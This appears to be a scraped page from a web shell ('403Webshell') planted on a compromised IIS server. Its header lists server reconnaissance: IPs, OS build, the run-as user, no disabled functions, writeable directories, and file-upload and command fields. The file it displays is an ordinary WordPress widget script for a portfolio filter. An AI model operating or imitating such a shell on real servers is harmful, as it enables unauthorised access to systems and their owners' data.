403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Old Sites/ict/wp-content/plugins/so-widgets-bundle/widgets/blog/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Old Sites/ict/wp-content/plugins/so-widgets-bundle/widgets/blog/js/portfolio.js
/* globals jQuery, sowb */

var sowb = window.sowb || {};

jQuery( function ( $ ) {

	sowb.setupBlogPortfolio = function () {
		$( '.sow-blog-layout-portfolio' ).each( function () {
			var $$ = $( this ),
				$buttons = $$.find( '.sow-portfolio-filter-terms button' ),
				$container = $$.find( '.sow-blog-posts' );

			$container.isotope( {
				itemSelector: '.sow-portfolio-item',
				filter: '*',
				layoutMode: 'fitRows',
				resizable: true,
			} );

			$buttons.on( 'click', function() {
				var selector = $( this ).attr( 'data-filter' );
				$container.isotope( {
					filter: selector,
				} );
				$buttons.removeClass( 'active' );
				$( this ).addClass( 'active' );
				return false;
			} );
		} );
	};

	sowb.setupBlogPortfolio();

	$( sowb ).on( 'setup_widgets', sowb.setupBlogPortfolio );
} );

window.sowb = sowb;

Youez - 2016 - github.com/yon3zu
LinuXploit